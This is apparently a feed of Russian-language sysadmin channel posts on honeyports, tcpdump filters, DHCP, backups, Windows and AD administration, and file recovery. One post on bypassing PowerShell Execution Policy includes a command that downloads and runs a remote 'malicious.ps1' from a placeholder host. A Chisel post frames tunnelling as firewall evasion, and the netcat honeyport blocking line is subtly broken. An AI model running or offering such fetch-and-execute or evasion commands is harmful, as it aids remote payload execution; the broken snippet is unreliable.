🔎 Как работают Honeyports и ловушки для сканеров

Сканирование портов - стандартный инструмент для разведки, используемый как администраторами, так и злоумышленниками. Honeyports - это техника создания ловушек для сканеров, позволяющая выявлять потенциальные угрозы и даже блокировать их.

❓ Что такое Honeyport?

Honeyport - это фейковый открытый порт, который выглядит для злоумышленника как настоящая служба. Однако при попытке взаимодействия с ним можно:

🔹 Логировать IP-адрес атакующего
🔹 Ограничивать или блокировать доступ через файрвол
🔹 Перенаправлять атакующего в песочницу

📱 Как настроить Honeyport в Linux с использованием netcat. Простейший honeyport можно создать с помощью netcat:

nc -lvp 8080 | tee -a /var/log/honeyport.log

Теперь при подключении к порту 8080 все введенные данные будут записываться в лог.
Если добавить автоматическую блокировку через iptables:

nc -lvp 8080 | while read line; do iptables -A INPUT -s $(echo $SSH_CLIENT | awk '{print $1}') -j DROP; done

Это заблокирует IP атакующего после первой попытки взаимодействия.

😥 Honeyports в Windows с PowerShell. В Windows можно создать honeyport и блокировать IP-адрес злоумышленника с помощью PowerShell:

$port = 3389  
while ($true) {  
    $listener = [System.Net.Sockets.TcpListener]$port  
    $listener.Start()  
    $client = $listener.AcceptTcpClient()  
    $ip = $client.Client.RemoteEndPoint.Address.IPAddressToString  
    Write-Host "Атакующий: $ip"  
    New-NetFirewallRule -DisplayName "Block $ip" -Direction Inbound -RemoteAddress $ip -Action Block  
    $listener.Stop()  
}

Этот скрипт создает ловушку на 3389 порту (RDP) и автоматически блокирует.

▪️ Готовые решения для honeypots. Для более продвинутых сценариев можно использовать:

🔹 Cowrie - эмуляция SSH/Telnet с записью действий атакующего
🔹 Dionaea - имитация уязвимых сервисов
🔹 Kippo - honeypot для SSH

#linux #windows #security

🧑‍💻 NetworkAdmin

🖥 Мониторинг сети с помощью BPF и tcpdump: продвинутый анализ трафика

При анализе сетевого трафика в Linux часто используют tcpdump, но его мощь раскрывается по-настоящему при использовании Berkeley Packet Filter (BPF). BPF позволяет фильтровать пакеты на уровне ядра, отбрасывая ненужные и снижая нагрузку на систему.

▪️ Основные принципы работы

BPF действует как программируемый фильтр, который определяет, какие пакеты должны быть обработаны и переданы в tcpdump. Это ускоряет анализ и снижает нагрузку на CPU.

▪️ Использование BPF в tcpdump

⭐️ Фильтрация по IP-адресу

tcpdump -i eth0 'host 192.168.1.100'

Перехватывает трафик, где участвует 192.168.1.100.

⭐️ Фильтрация по порту

tcpdump -i eth0 'port 443'

Выводит только HTTPS-трафик.

⭐️ Фильтрация по протоколу

tcpdump -i eth0 'tcp'

Отбирает только TCP-пакеты.

⭐️ Фильтрация по флагам TCP. Например, вывод только SYN-пакетов:

tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'

Полезно для анализа попыток соединения.

⭐️ Анализ пакетов в hex-формате

tcpdump -i eth0 -X 'host 10.0.0.1'

Показывает содержимое пакетов в удобном виде.

⭐️ Создание сложных фильтров. Можно комбинировать фильтры, например, анализировать только HTTP-запросы от конкретного IP:

tcpdump -i eth0 'tcp and port 80 and src host 192.168.1.10'

#linux #network

🧑‍💻 NetworkAdmin

⬇️ Быстрый анализ занятого места на диске в Linux

Когда нужно быстро определить, кто и где занимает больше всего места на диске, есть несколько удобных способов. Делюсь тремя вариантами, которые использую сам:

1️⃣ Ncdu – удобный интерфейс. Программа ncdu (NCurses Disk Usage) позволяет наглядно и удобно просматривать размер директорий. Она есть в репозиториях большинства дистрибутивов:

# apt install ncdu  # Для Debian/Ubuntu  
# yum install ncdu  # Для CentOS/RHEL  
# pacman -S ncdu    # Для Arch Linux  

Запустить можно командой ncdu /, после чего появится интерфейс, в котором легко перемещаться по папкам. Удобно, если приходится часто мониторить дисковое пространство.

2️⃣ Midnight Commander – быстрое сравнение размеров. Если у вас установлен MC, можно быстро оценить размер нескольких папок. Просто выделите их и нажмите Ctrl + Пробел. Midnight Commander ставлю на все серверы, так что этот способ использую постоянно.

3️⃣ du + sort – консольный анализ. Стандартная команда du отлично подходит для анализа дискового пространства:

du -hs * | sort -hr | head -10

Этот однострочник покажет 10 самых "тяжелых" директорий в текущем каталоге.
Если нужно логировать результаты, можно использовать скрипт:

#!/bin/bash

echo "==================================" >> dir_size.txt
echo "Dirs size $(date +"%Y-%m-%d_%H-%M")" >> dir_size.txt
echo "==================================" >> dir_size.txt
du -hs * | sort -hr | head -10 >> dir_size.txt

Так можно отслеживать изменения занятого места во времени.

#linux #storage

🧑‍💻 NetworkAdmin

Показалось…Наверное…🙂

#юмор

🧑‍💻 NetworkAdmin

✍️ Как работает DHCP и почему его стоит изучить глубже

DHCP (Dynamic Host Configuration Protocol) - один из самых базовых сетевых протоколов, который знаком любому администратору. Однако, если его не изучать специально, можно упускать важные нюансы.

🔵 Широковещательный домен

Клиент отправляет запрос на получение настроек широковещательно, поэтому сервер должен находиться в том же широковещательном домене. Если сеть сегментирована, то используется DHCP Relay, который пересылает запросы между сегментами.

🔵 Порты DHCP

Сервер слушает на UDP 67
Клиент принимает ответы на UDP 68

🔵 Что раздает DHCP-сервер

Помимо IP-адреса, маски и шлюза, сервер может передавать множество параметров:

➖ DNS-серверы
➖ Статические маршруты
➖ Адрес TFTP-сервера (например, для PXE-загрузки)
➖ MTU, часовой пояс, список NTP-серверов и многое другое

🔵 Механизм аренды IP-адресов

Когда клиент получает IP-адрес, он арендует его на определенное время.
По истечении половины аренды клиент пытается продлить ее
Если продление не удалось, адрес остается в использовании до конца аренды
После истечения аренды клиент снова ищет сервер для получения нового IP

🔵 Назначение IP-адресов клиентам. DHCP-сервер может назначать адреса:

По MAC-адресу
По ClientID (Machine-ID), который в ряде случаев имеет приоритет

🔵 Последовательность обмена DHCP-сообщениями

1️⃣ DHCPDISCOVER – клиент ищет DHCP-сервер
2️⃣ DHCPOFFER – сервер предлагает параметры
3️⃣ DHCPREQUEST – клиент выбирает и запрашивает конфигурацию
4️⃣ DHCPACK – сервер подтверждает выделенный IP

🔵 Конфликты IP-адресов

DHCP-сервер не гарантирует, что в сети не будет конфликтов IP-адресов. Он может проверять доступность IP перед выдачей, но это не исключает коллизий.

⭐️ DHCP Snooping – защита от «левых» DHCP-серверов

Иногда в сети появляется «нелегальный» DHCP-сервер. Например, сотрудник подключает свой домашний роутер к офисной сети, и часть клиентов начинает получать IP-адреса от него. В результате доступ в сеть ломается.

Решить проблему помогает DHCP Snooping - механизм защиты на уровне коммутаторов:

➖ Коммутатор фильтрует DHCP-трафик и отбрасывает запросы с неавторизованных портов
➖ DHCP-серверы доверяются только на определенных портах
➖ Это предотвращает работу поддельных DHCP-серверов в сети

#network #DHCP

🧑‍💻 NetworkAdmin

Не мы такие, жизнь такая 😐

#юмор

🧑‍💻 NetworkAdmin

🖨️ Windows сама меняет принтер по умолчанию? Исправляем!

Начиная с Windows 10 1511, Microsoft изменила логику выбора принтера по умолчанию. Теперь система автоматически назначает последний использованный принтер в текущем местоположении.

Разбираемся, как отключить автоназначение принтера в Windows. Запретить системе менять принтер по умолчанию несколькими способами:

1️⃣ Через параметры Windows:

Отключите опцию «Let Windows manage my default printer» в Настройки → Устройства → Принтеры и сканеры.

2️⃣ Через реестр: Выполните команду:

REG ADD "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" -v LegacyDefaultPrinterMode /t REG_DWORD /d 1 /f

3️⃣ Через групповую политику (GPO):

Настройте параметр «Turn off Windows default printer management» в разделе:

User Configuration → Administrative Templates → Control Panel → Printers

После применения настроек Windows больше не будет менять принтер автоматически

#windows #printers

🧑‍💻 NetworkAdmin

😄 Автоматизация резервного копирования логов в Linux: rsync

rsync - это инструмент для синхронизации файлов и каталогов. Пример команды для копирования логов на удалённый сервер:

rsync -avz --delete /var/log/ user@backup-server:/backup/logs/

-a - архивный режим (сохраняет права и атрибуты)
-v – показывает процесс копирования
-z – сжатие данных при передаче
--delete – удаляет на резервном сервере файлы, которых нет в исходной папке

▪️Для копирования по SSH без пароля можно создать ключи:

ssh-keygen -t rsa
ssh-copy-id user@backup-server

▪️ Автоматизация через cron. Чтобы rsync запускался автоматически, добавим задание в cron:

crontab -e

Пример задания для ежедневного копирования логов в 3 часа ночи:

0 3 * * * rsync -avz --delete /var/log/ user@backup-server:/backup/logs/

▪️ Проверка и мониторинг. Можно добавить запись в лог при успешном выполнении:

0 3 * * * rsync -avz --delete /var/log/ user@backup-server:/backup/logs/ >> /var/log/backup.log 2>&1

Проверить, срабатывает ли задача, можно командой:

grep rsync /var/log/syslog

#linux #backup

🧑‍💻 NetworkAdmin

😢 Обход ограничений Execution Policy в Windows: способы и риски

PowerShell в Windows использует Execution Policy для защиты от запуска неподписанных или вредоносных скриптов. Однако часто возникает ситуация, когда необходимо обойти эти ограничения. Разберём популярные способы.

1️⃣ Запуск с параметром -ExecutionPolicy Bypass. Самый простой способ временно отключить политику выполнения:

powershell -ExecutionPolicy Bypass -File noscript.ps1

Позволяет запустить скрипт без изменения системных настроек.

2️⃣ Изменение политики выполнения. Можно явно разрешить выполнение скриптов:

Set-ExecutionPolicy Unrestricted -Scope Process

⚠️ Работает только в текущем сеансе PowerShell.

3️⃣ Выполнение через powershell -Command. Позволяет выполнять код без изменения политики:

powershell -Command "Start-Process notepad.exe"

Хорошо подходит для разового выполнения команд.

4️⃣ Использование IEX (Invoke-Expression). Позволяет загружать и выполнять код из строки или сети:

IEX (New-Object Net.WebClient).DownloadString('http://example.com/malicious.ps1')

Удобно для удалённого выполнения команд.

5️⃣ Изменение реестра. Политику можно изменить через реестр:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" -Name ExecutionPolicy -Value Unrestricted

Даёт постоянный эффект.

6️⃣ Использование PowerShell.dll. Можно загрузить PowerShell как библиотеку в обход стандартного механизма запуска:

System.Management.Automation.PowerShell.Create().AddScript("Start-Process calc.exe").Invoke();

Подходит для внедрения в программы.

#windows #noscripts

🧑‍💻 NetworkAdmin

Как узнать, кто активно использует swap в Linux?

1️⃣ Проверка через top. В top по умолчанию нет колонки с использованием swap, но её можно включить:

1. Откройте top
2. Нажмите f, затем выберите Swap (s)
3. Подтвердите q - появится колонка с потреблением swap

Однако top не всегда корректно отображает эти данные, поэтому в htop колонку со swap вовсе убрали, чтобы не вводить пользователей в заблуждение.

2️⃣ Точный способ через /proc. Более надёжный способ – заглянуть в файлы /proc/$PID/smaps или /proc/$PID/status:

/proc/$PID/smaps – самый точный, но требует сложных вычислений
/proc/$PID/status – содержит суммарное значение в поле VmSwap, удобнее для быстрого анализа

✏️ Bash-скрипт для проверки. Можно использовать простой скрипт, который покажет, какие процессы активно используют swap:

#!/bin/bash 
SUM=0
OVERALL=0
for DIR in $(find /proc/ -maxdepth 1 -type d -regex "^/proc/[0-9]+"); do
    PID=$(basename $DIR)
    PROGNAME=$(ps -p $PID -o comm --no-headers)
    for SWAP in $(grep VmSwap $DIR/status 2>/dev/null | awk '{ print $2 }'); do
        let SUM=$SUM+$SWAP
    done
    if (( $SUM > 0 )); then
        echo "PID=$PID swapped $SUM KB ($PROGNAME)"
    fi
    let OVERALL=$OVERALL+$SUM
    SUM=0
done
echo "Overall swap used: $OVERALL KB"

Этот скрипт проверяет VmSwap для каждого процесса и выводит общий объём использованного swap.

🌟 Быстрая проверка в одну команду. Если нет желания писать скрипты, можно просто выполнить:

for file in /proc/*/status; do 
    awk '/VmSwap|Name/{printf $2 " " $3} END { print ""}' $file
done | sort -k 2 -n -r | less

Эта команда отобразит процессы, отсортированные по объёму используемого swap.

#linux #swap #monitoring

🧑‍💻 NetworkAdmin

✉️ Бэкап почты через imap-backup: сохраняем письма локально

imap-backup - удобный инструмент для скачивания писем из любого IMAP ящика и сохранения их локально в формате mbox.

▪️ Когда это может пригодиться?

Перенос почты: например, если нужно забрать письма из облачного сервиса.
Архивирование старых писем: можно скачать только письма за последние 3 года (или другой период) и хранить их локально.
Бэкап на случай утери доступа к облачным ящикам.

▪️ Установка imap-backup. Программа написана на Ruby, так что проще всего установить её через gem:

apt install rubygems -y
gem install imap-backup

▪️ Настройка. После установки можно выполнить первоначальную настройку через команду:

imap-backup setup

Или создать конфиг вручную (~/.imap-backup/config.json). Пример для Яндекса:

{
  "version": "2.0",
  "accounts": [
    {
      "username": "zabbix@networkadmin.ru",
      "password": "pass",
      "local_path": "/root/.imap-backup/zabbix_networkadmin.ru",
      "folders": [],
      "server": "imap.yandex.ru"
    }
  ]
}

⚠️ Для доступа по IMAP в настройках почтового ящика нужно создать пароль для приложения.

▪️ Как это работает?

imap-backup скачивает письма в отдельный каталог.
Каждая IMAP-папка - это отдельный файл mbox.
Формат mbox можно легко открыть в Thunderbird с помощью ImportExportTools NG.

#backup #email

🧑‍💻 NetworkAdmin

Это была непростая задача, но он справился 😏

#юмор

🧑‍💻 NetworkAdmin

👤 Добавление фото пользователя в Active Directory

В Active Directory можно хранить фото пользователей, которое затем отображается в Outlook, Word, Excel, Lync, SharePoint и даже используется в качестве аватарки в Windows.

💡 Фото хранится прямо в AD, поэтому не стоит загружать слишком большие изображения, чтобы избежать лишней нагрузки на каталог.

📌 Рекомендуемый размер - 96x96 пикселей, до 10 Кб.

▪️ Как загрузить фото в AD через PowerShell? Используем командлет Set-ADUser:

$photo = [byte[]](Get-Content C:\PS\admin_photo.jpg -Encoding byte)  
Set-ADUser vvkuzmin -Replace @{thumbnailPhoto=$photo}

Теперь фото появится в поддерживаемых приложениях и в системе.

#windows #activedirectory

🧑‍💻 NetworkAdmin

🖥 Chisel: проброс TCP/UDP-трафика через HTTP-туннели

Chisel - это удобный инструмент для создания HTTP-туннелей и проброса трафика через ограниченные сети. Он позволяет прокидывать TCP/UDP-соединения через HTTP/HTTPS, обходя firewall'ы и NAT. Полезен для удалённого администрирования, тестирования безопасности и обхода сетевых ограничений.

▪️ Особенности Chisel

🔹 Поддерживает двухсторонние TCP и UDP туннели
🔹 Работает через HTTP и HTTPS (можно замаскировать под веб-трафик)
🔹 Поддерживает авторизацию через ключи
🔹 Кроссплатформенный: Windows, Linux, macOS

▪️ Как использовать Chisel?

1️⃣ Запускаем сервер на машине с внешним IP:

chisel server --port 8080 --reverse

2️⃣ Подключаем клиента для проброса порта (например, RDP 3389) на удалённый сервер:

chisel client http://server-ip:8080 R:3389:127.0.0.1:3389

Теперь можно подключаться к удалённому серверу по localhost:3389.

#network

🧑‍💻 NetworkAdmin

📎 Оптимизация работы с Bash-скриптами: функции, массивы, работа с JSON

1️⃣ Функции - пишем код повторно. Функции позволяют избежать дублирования кода и делают скрипты более читаемыми.

Пример функции с аргументами:

#!/bin/bash

log_message() {
    local level="$1"
    local message="$2"
    echo "[$level] $message"
}

log_message "INFO" "Скрипт запущен"
log_message "ERROR" "Произошла ошибка"

2️⃣ Массивы - храним данные удобнее. Вместо множества отдельных переменных можно использовать массивы.

Пример работы с массивами:

#!/bin/bash

servers=("server1" "server2" "server3")

for srv in "${servers[@]}"; do
    echo "Подключаюсь к $srv..."
done

3️⃣ Работа с JSON через jq. Bash не умеет работать с JSON, но jq исправляет этот недостаток.

Разбираем JSON и получаем данные:

#!/bin/bash

json='{"user": "admin", "role": "root"}'

user=$(echo "$json" | jq -r '.user')
role=$(echo "$json" | jq -r '.role')

echo "Имя пользователя: $user"
echo "Роль: $role"

#bash

🧑‍💻 NetworkAdmin

🤢 Удобный инструмент для резервного копирования и восстановления Linux

Если вы ищете простой и надежный способ бэкапа и восстановления Linux-систем, попробуйте ReaR (Relax and Recover). Этот инструмент позволяет создавать резервные копии как физических серверов, так и виртуальных машин, формируя загрузочный ISO-образ и архив данных.

▪️ Установка ReaR в Debian. ReaR есть в стандартных репозиториях, так что установка проходит просто:

apt install rear genisoimage syslinux nfs-common

▪️ Как работает ReaR:

1️⃣ Создаёт загрузочный ISO-образ
2️⃣ Архивирует данные в tar
3️⃣ Позволяет восстановить систему через ISO + архив

Этот метод удобен, так как не требует остановки системы и работает без установки дополнительных агентов.

▪️ Пример настройки. Конфиг /etc/rear/local.conf для сохранения бэкапа на NFS:

OUTPUT=ISO
OUTPUT_URL=nfs://192.168.13.50/backup
BACKUP=NETFS
BACKUP_URL=nfs://192.168.13.50/backup
BACKUP_PROG_EXCLUDE=("${BACKUP_PROG_EXCLUDE[@]}" '/media' '/var/crash')

Запуск бэкапа:

rear -v -d mkbackup

На выходе получаем файлы:

backup.tar.gz, rear-debian.iso, README

▪️ Восстановление системы. Загружаемся с созданного ISO

Запускаем восстановление:

rear -v -d recover

ReaR автоматически восстанавливает разметку дисков, LVM, файловые системы и сетевые настройки.

#linux #backup

🧑‍💻 NetworkAdmin

Похоже на массовый сбой 🧐

#юмор

🧑‍💻 NetworkAdmin

🫂 Ограничение на количество сетевых подключений в Windows

В десктопных версиях Windows 10 и 11 существует лимит на максимальное количество одновременных сетевых подключений – 20 активных сессий. Если этот предел превышен (например, при расшаривании папки или сетевого принтера), появляется ошибка:

🚫 Дополнительные подключения к этому удаленному компьютеру сейчас невозможны, так как их число достигло предела.

▪️ Почему так происходит?

Microsoft искусственно ограничивает использование десктопных версий Windows в качестве сервера, предлагая приобрести лицензию Windows Server, где подобных ограничений нет.

▪️ Управление сетевыми сессиями

Просмотр активных подключений:

net session

Отключение всех сессий с конкретного IP:

net session \\192.168.21.11 /d /y

Сокращение таймаута автоматического отключения неактивных клиентов (по умолчанию 15 минут, можно снизить до 5):

net config server /autodisconnect:5

▪️ Автоматическое отключение сессий через PowerShell. Можно настроить мониторинг активных подключений и отключение при превышении лимита, как пример:

$maxSessions = 18  # Устанавливаем порог (лучше немного ниже лимита)
$activeSessions = (query session 2>$null | Measure-Object -Line).Lines

if ($activeSessions -ge $maxSessions) {
    Write-Host "Превышено допустимое количество подключений! Отключаем неактивные сессии..."
    Get-CimInstance Win32_ServerConnection | ForEach-Object {
        Net Session \\$_.ComputerName /DELETE /Y
        Write-Host "Отключена сессия с $_.ComputerName"
    }
} else {
    Write-Host "Текущих подключений: $activeSessions. Все в пределах нормы."
}

Этот скрипт:

Проверяет количество активных подключений.
Если превышен заданный порог (например, 18 сессий), он отключает неактивные.
Выводит информацию в консоль.

Добавить исполнение в планировщик:

schtasks /create /tn "AutoCloseSessions" /tr "powershell.exe -File C:\Scripts\AutoCloseSessions.ps1" /sc minute /mo 5 /ru SYSTEM

#windows #sessions

🧑‍💻 NetworkAdmin

🚫 Техники блокировки сайтов и приложений через GPO и PowerShell

В корпоративной среде возникают задачи ограничения доступа к определенным сайтам и приложениям. В Windows это можно реализовать несколькими способами: через GPO (Group Policy Object), PowerShell, брандмауэр (Windows Firewall) и DNS-фильтрацию. Сегодня разберем эти методы блокировки.

▪️ Блокировка сайтов через GPO (Group Policy Object). Этот метод подойдет для централизованного управления в домене Active Directory.

📍 Запрещаем доступ к сайтам через Internet Explorer/Edge:

1️⃣ Открываем gpedit.msc (или gpmc.msc для домена).
2️⃣ Переходим в:

Конфигурация пользователя → Политики → Административные шаблоны → Компоненты Windows → Internet Explorer → Панель управления Интернет-параметрами

3️⃣ Включаем политику "Ограничить доступ к определенным веб-сайтам" и добавляем запрещенные URL.

📍 Запрещаем сайты через "Файл хостов": Чтобы вручную перенаправить сайты на локальный IP, можно использовать GPO + скрипт PowerShell:

Set-Content -Path "C:\Windows\System32\drivers\etc\hosts" -Value "127.0.0.1 vk.com`n127.0.0.1 youtube.com" -Force

Этот скрипт можно развернуть через GPO при входе пользователя в систему.

▪️ Блокировка сайтов через PowerShell и Windows Firewall. Этот метод позволяет запретить доступ ко всем браузерам к указанным сайтам.

Добавляем правило в брандмауэр Windows для блокировки сайтов:

New-NetFirewallRule -DisplayName "Block Facebook" -Direction Outbound -Action Block -RemoteAddress "157.240.0.0/16"

Этот метод хорош тем, что работает даже в Chrome, Yandex и других браузерах.

📍 Автоматическое определение IP-адресов сайтов:

$ips = [System.Net.Dns]::GetHostAddresses("youtube.com") | Select-Object IPAddressToString  
New-NetFirewallRule -DisplayName "Block YouTube" -Direction Outbound -Action Block -RemoteAddress $ips.IPAddressToString

▪️ Блокировка приложений через GPO. Запрещаем запуск программ по имени:

1️⃣ Открываем gpedit.msc
2️⃣ Переходим в:

Конфигурация пользователя → Административные шаблоны → Система

3️⃣ Включаем политику "Не запускать указанные приложения Windows"
4️⃣ Добавляем chrome.exe, telegram.exe и другие запрещенные программы.

📍 Запрещаем запуск по пути: Если нужно заблокировать запуск из определенного каталога, можно использовать GPO:

Конфигурация компьютера → Политики → Настройки Windows → Параметры безопасности → Политики ограничения программ
Добавляем правило для C:\Users*\AppData\Local\Telegram Desktop.

▪️ Блокировка приложений через PowerShell. Автоматическое завершение процессов запрещенных программ:

$blockedApps = @("telegram.exe", "chrome.exe", "utorrent.exe")
while ($true) {
    Get-Process | Where-Object { $_.ProcessName -in $blockedApps } | Stop-Process -Force
    Start-Sleep -Seconds 5
}

Этот скрипт можно добавить в автозагрузку через GPO или Task Scheduler.

📍 Запрещение установки определенных программ:

New-AppLockerPolicy -Xml "C:\Policies\AppLocker.xml" -RuleCollectionType Executable

Можно указать список разрешенных программ, и все остальные просто не запустятся.

#windows #security

🧑‍💻 NetworkAdmin

🗑 Восстановление случайно удаленных файлов в ext4 и XFS

Удаление файлов - дело секундное, но восстановление их может быть нетривиальной задачей. В файловых системах ext4 и XFS удаленные файлы могут оставаться на диске до тех пор, пока их блоки не будут перезаписаны. Поговорим про основные способы восстановления.

1️⃣ Восстановление в ext4 с помощью extundelete. extundelete позволяет восстановить файлы, если файловая система не была перезаписана.

Установка:

sudo apt install extundelete

Размонтируем диск (например, /dev/sdb1):

sudo umount /dev/sdb1

Восстановим все удаленные файлы:

sudo extundelete /dev/sdb1 --restore-all

Или восстановим конкретный файл:

sudo extundelete /dev/sdb1 --restore-file /home/user/deleted.txt

Файлы будут сохранены в каталоге RECOVERED_FILES.

2️⃣ Поиск удаленных файлов в ext4 с помощью debugfs. Если extundelete не сработал, можно использовать debugfs:

Открываем диск:

sudo debugfs /dev/sdb1

Показываем последние удаленные файлы:

lsdel

Восстанавливаем файл по inode:

dump <номер inode> recovered_file.txt

3️⃣ Восстановление файлов в XFS с помощью xfs_undelete. В XFS механизм хранения данных отличается, но можно воспользоваться xfs_undelete.

Установим утилиту:

git clone https://github.com/ianka/xfs_undelete.git
cd xfs_undelete
make
sudo make install

Запускаем сканирование диска и восстановление файлов:

sudo xfs_undelete -d /dev/sdb1 -o /mnt/recovery

Все найденные файлы окажутся в /mnt/recovery.

#linux #recovery

🧑‍💻 NetworkAdmin